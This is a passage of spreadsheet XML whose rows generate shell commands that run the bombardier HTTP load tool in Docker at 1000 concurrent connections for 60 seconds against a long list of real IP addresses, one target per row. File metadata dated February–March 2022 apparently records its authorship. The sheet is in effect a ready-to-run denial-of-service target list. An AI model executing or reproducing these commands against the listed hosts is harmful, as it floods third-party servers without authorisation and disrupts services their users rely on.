        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 207.180.207.179&amp;&amp; sleep 5;</v>
      </c>
      <c r="B158" s="1" t="s">
        <v>227</v>
      </c>
      <c r="C158" s="1" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="159" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A159" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B159&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 207.148.248.143&amp;&amp; sleep 5;</v>
      </c>
      <c r="B159" s="1" t="s">
        <v>229</v>
      </c>
      <c r="C159" s="1" t="s">
        <v>229</v>
      </c>
    </row>
    <row r="160" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A160" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B160&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.20.55.247&amp;&amp; sleep 5;</v>
      </c>
      <c r="B160" s="1" t="s">
        <v>230</v>
      </c>
      <c r="C160" s="1" t="s">
        <v>230</v>
      </c>
    </row>
    <row r="161" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A161" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B161&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.20.55.181&amp;&amp; sleep 5;</v>
      </c>
      <c r="B161" s="1" t="s">
        <v>231</v>
      </c>
      <c r="C161" s="1" t="s">
        <v>231</v>
      </c>
    </row>
    <row r="162" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A162" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B162&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.20.50.21&amp;&amp; sleep 5;</v>
      </c>
      <c r="B162" s="1" t="s">
        <v>232</v>
      </c>
      <c r="C162" s="1" t="s">
        <v>232</v>
      </c>
    </row>
    <row r="163" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A163" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B163&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.178.208.45&amp;&amp; sleep 5;</v>
      </c>
      <c r="B163" s="1" t="s">
        <v>233</v>
      </c>
      <c r="C163" s="1" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="164" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A164" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B164&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 173.249.63.101&amp;&amp; sleep 5;</v>
      </c>
      <c r="B164" s="1" t="s">
        <v>234</v>
      </c>
      <c r="C164" s="1" t="s">
        <v>228</v>
      </c>
    </row>
    <row r="165" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A165" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B165&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.60.110&amp;&amp; sleep 5;</v>
      </c>
      <c r="B165" s="1" t="s">
        <v>235</v>
      </c>
      <c r="C165" s="1" t="s">
        <v>235</v>
      </c>
    </row>
    <row r="166" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A166" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B166&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.46.56&amp;&amp; sleep 5;</v>
      </c>
      <c r="B166" s="1" t="s">
        <v>236</v>
      </c>
      <c r="C166" s="1" t="s">
        <v>236</v>
      </c>
    </row>
    <row r="167" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A167" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B167&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.27.147&amp;&amp; sleep 5;</v>
      </c>
      <c r="B167" s="1" t="s">
        <v>237</v>
      </c>
      <c r="C167" s="1" t="s">
        <v>237</v>
      </c>
    </row>
    <row r="168" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A168" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B168&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 15.197.142.173&amp;&amp; sleep 5;</v>
      </c>
      <c r="B168" s="1" t="s">
        <v>8</v>
      </c>
      <c r="C168" s="1" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="169" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A169" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B169&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.69.139.180&amp;&amp; sleep 5;</v>
      </c>
      <c r="B169" s="1" t="s">
        <v>238</v>
      </c>
      <c r="C169" s="1" t="s">
        <v>239</v>
      </c>
    </row>
    <row r="170" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A170" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B170&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.241.116.117&amp;&amp; sleep 5;</v>
      </c>
      <c r="B170" s="1" t="s">
        <v>240</v>
      </c>
      <c r="C170" s="1" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="171" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A171" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B171&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 186.2.163.112&amp;&amp; sleep 5;</v>
      </c>
      <c r="B171" s="1" t="s">
        <v>242</v>
      </c>
      <c r="C171" s="1" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="172" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A172" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B172&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.59.1.205&amp;&amp; sleep 5;</v>
      </c>
      <c r="B172" s="1" t="s">
        <v>243</v>
      </c>
      <c r="C172" s="1" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="173" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A173" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B173&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.188.109.70&amp;&amp; sleep 5;</v>
      </c>
      <c r="B173" s="1" t="s">
        <v>244</v>
      </c>
      <c r="C173" s="1" t="s">
        <v>245</v>
      </c>
    </row>
    <row r="174" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A174" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B174&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.159.233.17&amp;&amp; sleep 5;</v>
      </c>
      <c r="B174" s="1" t="s">
        <v>246</v>
      </c>
      <c r="C174" s="1" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="175" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A175" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B175&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 46.165.223.182&amp;&amp; sleep 5;</v>
      </c>
      <c r="B175" s="1" t="s">
        <v>247</v>
      </c>
      <c r="C175" s="1" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="176" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A176" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B176&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.161.62.100&amp;&amp; sleep 5;</v>
      </c>
      <c r="B176" s="1" t="s">
        <v>248</v>
      </c>
      <c r="C176" s="1" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="177" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A177" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B177&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.225.40.162&amp;&amp; sleep 5;</v>
      </c>
      <c r="B177" s="1" t="s">
        <v>249</v>
      </c>
      <c r="C177" s="1" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="178" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A178" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B178&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.32.57.184&amp;&amp; sleep 5;</v>
      </c>
      <c r="B178" s="1" t="s">
        <v>250</v>
      </c>
      <c r="C178" s="1" t="s">
        <v>250</v>
      </c>
    </row>
    <row r="179" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A179" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B179&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.99.13.12&amp;&amp; sleep 5;</v>
      </c>
      <c r="B179" s="1" t="s">
        <v>251</v>
      </c>
      <c r="C179" s="1" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="180" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A180" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B180&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.99.13.11&amp;&amp; sleep 5;</v>
      </c>
      <c r="B180" s="1" t="s">
        <v>252</v>
      </c>
      <c r="C180" s="1" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="181" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A181" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B181&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 152.32.128.152&amp;&amp; sleep 5;</v>
      </c>
      <c r="B181" s="1" t="s">
        <v>253</v>
      </c>
      <c r="C181" s="1" t="s">
        <v>253</v>
      </c>
    </row>
    <row r="182" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A182" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B182&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 144.76.167.14&amp;&amp; sleep 5;</v>
      </c>
      <c r="B182" s="1" t="s">
        <v>254</v>
      </c>
      <c r="C182" s="1" t="s">
        <v>255</v>
      </c>
    </row>
    <row r="183" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A183" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B183&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 94.251.82.138&amp;&amp; sleep 5;</v>
      </c>
      <c r="B183" s="1" t="s">
        <v>256</v>
      </c>
      <c r="C183" s="1" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="184" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A184" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B184&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.226.31.57&amp;&amp; sleep 5;</v>
      </c>
      <c r="B184" s="1" t="s">
        <v>258</v>
      </c>
      <c r="C184" s="1" t="s">
        <v>258</v>
      </c>
    </row>
    <row r="185" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A185" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B185&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.195.240.135&amp;&amp; sleep 5;</v>
      </c>
      <c r="B185" s="1" t="s">
        <v>259</v>
      </c>
      <c r="C185" s="1" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="186" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A186" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B186&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.189.114.24&amp;&amp; sleep 5;</v>
      </c>
      <c r="B186" s="1" t="s">
        <v>260</v>
      </c>
      <c r="C186" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="187" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A187" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B187&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.189.182.182&amp;&amp; sleep 5;</v>
      </c>
      <c r="B187" s="1" t="s">
        <v>261</v>
      </c>
      <c r="C187" s="1" t="s">
        <v>262</v>
      </c>
    </row>
    <row r="188" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A188" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B188&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.156.201.109&amp;&amp; sleep 5;</v>
      </c>
      <c r="B188" s="1" t="s">
        <v>263</v>
      </c>
      <c r="C188" s="1" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="189" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A189" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B189&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.148.96.132&amp;&amp; sleep 5;</v>
      </c>
      <c r="B189" s="1" t="s">
        <v>264</v>
      </c>
      <c r="C189" s="1" t="s">
        <v>264</v>
      </c>
    </row>
    <row r="190" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A190" t="s">
        <v>1</v>
      </c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</sheetData>
  <conditionalFormatting sqref="B820:B1048576 B1">
    <cfRule type="duplicateValues" dxfId="14" priority="124"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B820:B1048576">
    <cfRule type="duplicateValues" dxfId="13" priority="38"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="12" priority="22"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="11" priority="21"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="10" priority="20"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B820:B1048576 B1 B814">
    <cfRule type="duplicateValues" dxfId="9" priority="18"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="8" priority="156"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814:B1048576 B1 B191:B294">
    <cfRule type="duplicateValues" dxfId="5" priority="5"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B191:B294">
    <cfRule type="duplicateValues" dxfId="4" priority="172"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B2">
    <cfRule type="duplicateValues" dxfId="3" priority="2"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B2">
    <cfRule type="duplicateValues" dxfId="2" priority="3"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B2">
    <cfRule type="duplicateValues" dxfId="1" priority="4"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B3:B1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Вад</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-26T20:00:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-18T10:57:50Z</dcterms:modified>
</cp:coreProperties>
</file>